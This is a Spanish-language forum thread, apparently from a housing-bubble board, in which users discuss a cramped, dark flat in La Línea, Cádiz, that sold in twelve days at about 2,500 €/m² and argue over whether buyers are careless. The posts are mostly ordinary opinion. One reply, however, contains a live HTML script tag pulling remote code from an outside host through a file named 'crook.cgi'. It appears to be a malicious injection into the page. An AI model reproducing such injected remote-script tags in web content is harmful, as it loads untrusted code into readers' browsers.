La gente es petulante, es para rendirse

SUPREME

Madmaxista
Desde
1 Oct 2006
Mensajes
1.568
Reputación
86
La tia de mi mujer, ha tardado 12 días en vender una hez de piso impresionante, por un precio alto para la zona y en 12 días lo ha vendido y lo han pagado ya incluso.

Estas cosas son las que hacen q uno se plantee q narices leemos y q cachopo creemos, cuando despues viene un petulante y paga por un zulo sin ascensor lo que han pagado.

La cifra quizás no sea muy interesante, han sido 29 kilos, un piso centrico pero sin ascensor, con 70 metros y las habitaciones ridiculas al máximo (una de ellas tienen puerta corredera xq no entra una puerta normal y la cama).
2500€ el metro (y no se si ha sido por inmo y le hayan metido al pepito 5000 pavos de comisión). El tema es que mi piso me costó el metro 1300€/m en una zona buena y el piso en mejor condición con luz y to el rollo. La gente sigue soltando sin pensar o q?

Pues lo dicho, flipado me he qdao, porque cuando lo iban a vender y por lo q pedían yo pensaba q se lo comían con patatas (lo dicho es una verdadera hez de piso), y 12 días.

Se que el precio para madrid o bcn es tirado, pero no es lo mismo por aquí vaya. Esto me hace plantearme además que los especulatas se moveran como langostas a otras zonas donde no esté todo tan a fuego, y lo de la hez esa de q queda recorrido es verdad.

Para derrumbarse vamos.
 

Mi_casa_es_tu_casa

Madmaxista
Desde
19 Jul 2006
Mensajes
5.475
Reputación
58
Lugar
BCN
Todo depende de cómo sea la vivienda, de que quien paga se hipoteque o no... de todas maneras yo hoy por hoy no compraría nada de vivienda (a no ser que el precio esté claramente infravalorado, el que tú das no lo está del todo)... dado que aún hay mucho margen de bajada.

No te extrañe que de aquí a un tiempo ese piso valga 20 millones.
<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:

Virtualcharly

Madmaxista
Desde
10 Oct 2006
Mensajes
217
Reputación
24
SUPREME dijo:
La tia de mi mujer, ha tardado 12 días en vender una hez de piso impresionante, por un precio alto para la zona y en 12 días lo ha vendido y lo han pagado ya incluso.

Estas cosas son las que hacen q uno se plantee q narices leemos y q cachopo creemos, cuando despues viene un petulante y paga por un zulo sin ascensor lo que han pagado.

La cifra quizás no sea muy interesante, han sido 29 kilos, un piso centrico pero sin ascensor, con 70 metros y las habitaciones ridiculas al máximo (una de ellas tienen puerta corredera xq no entra una puerta normal y la cama).
2500€ el metro (y no se si ha sido por inmo y le hayan metido al pepito 5000 pavos de comisión). El tema es que mi piso me costó el metro 1300€/m en una zona buena y el piso en mejor condición con luz y to el rollo. La gente sigue soltando sin pensar o q?

Pues lo dicho, flipado me he qdao, porque cuando lo iban a vender y por lo q pedían yo pensaba q se lo comían con patatas (lo dicho es una verdadera hez de piso), y 12 días.

Se que el precio para madrid o bcn es tirado, pero no es lo mismo por aquí vaya. Esto me hace plantearme además que los especulatas se moveran como langostas a otras zonas donde no esté todo tan a fuego, y lo de la hez esa de q queda recorrido es verdad.

Para derrumbarse vamos.
¿en qué ciudad?
 

SUPREME

Madmaxista
Desde
1 Oct 2006
Mensajes
1.568
Reputación
86
A mi me hunden estas cosas, porque como digo, el piso es un bujio, no es muy pequeño en metros, pero la distribución es ridículamente estulta, es oscuro al máximo y además está en la zona de marcha, es decir, fines de semana en verano con ventanas cerradas.

12 días, esto es lo q más me sorprende. 12 días...

Lo que digo yo, como langostas, van a huir de zonas como madrid y bcn q están al tope en cuanto a endeudamiento para extender la hez por todos lados. Al final toda vivienda al máximo precio con relación al endeudamiento o q?
 

SUPREME

Madmaxista
Desde
1 Oct 2006
Mensajes
1.568
Reputación
86
Virtualcharly dijo:
¿en qué ciudad?
La Línea, en Cádiz, el pueblo más pobre de España junto con San Fernando (tb en Cádiz), eso sí, el blanqueo de capital brutal, somos frontera con Gibraltar.
 

SUPREME

Madmaxista
Desde
1 Oct 2006
Mensajes
1.568
Reputación
86
Ladrillo Mortal dijo:
¿Sabes si han sido pagapensiones?.
Seguro que no, no hay muchos por aquí, por motivos evidentes (el empleo bastante bastante regular, atendiendo al post anterior)
 

Ladrillo Mortal

Será en Octubre
Desde
11 Dic 2006
Mensajes
26.406
Reputación
64.919
SUPREME dijo:
Seguro que no, no hay muchos por aquí, por motivos evidentes (el empleo bastante bastante regular, atendiendo al post anterior)
Entre el pepitismo autóctono, y los pagapensiones o purga económica, o nada. :(
 

comparto-piso

Madmaxista
Desde
15 Abr 2007
Mensajes
1.163
Reputación
848
es cuestion de suerte. Yo me acuerdo hace años que vendi de segundamano en ebay una PDA por mas de lo que valia nuevaen la tienda de al lado de mi casa. es cuestion de que aparezca alguien que porque lo qneu sea no se informa o lo hace con prisa ....

Eso si cada vez hay menos gente de esa y por eso cuesta tanto vender ultimamente. pero alguno hay. todavia un tipo me comento el otro dia que iba a compar una segunda vivienda para ir alquilandola y que se fuera pagando y luego al hacer los calculos iba a pagar mas de intereses de la hipoteca que lo que iba a cobrar de alquiler. HAY GENTE PA TO
 

Ladrillo Mortal

Será en Octubre
Desde
11 Dic 2006
Mensajes
26.406
Reputación
64.919
ex-burbujista dijo:
bienvenido al mundo real, y eso que NO SE VENDE NA´ , realmente vivis en mundos alternativos.
yA HE DICHO QUE CUANDO HAYA SIGNOS REALES DE BAJADAS DE PRECIOS SERÉ EL PRIMERO EN PUBLICARLO, DE MOMENTO VA PARA LARGO...
,
Y qué hacemos Ex-Burbujista, ¿nos vamos todos corriendo al Banco a pedir un crédito para pagar un zulo por 60 kilos?.
 

ex-burbujista

Madmaxista
Desde
20 Sep 2006
Mensajes
3.481
Reputación
54
Ladrillo Mortal dijo:
Y qué hacemos Ex-Burbujista, ¿nos vamos todos corriendo al Banco a pedir un crédito para pagar un zulo por 60 kilos?.
aqui nadie habla de lo que hay que hacer, simplemente analizamos la situacion.

se puede ser realista o engañarse, LO QUE LUEGO HAGA CADA UNO ES COSA DE ÉL.
 

autsaider

Madmaxista
Desde
1 May 2007
Mensajes
24.154
Reputación
37.310
Ladrillo Mortal dijo:
Y qué hacemos Ex-Burbujista, ¿nos vamos todos corriendo al Banco a pedir un crédito para pagar un zulo por 60 kilos?.
¿Donde ha escrito eso ex-burbujista? ¿O es que se lo ha borrado ella misma para luego abrir un hilo para quejarse del moderador?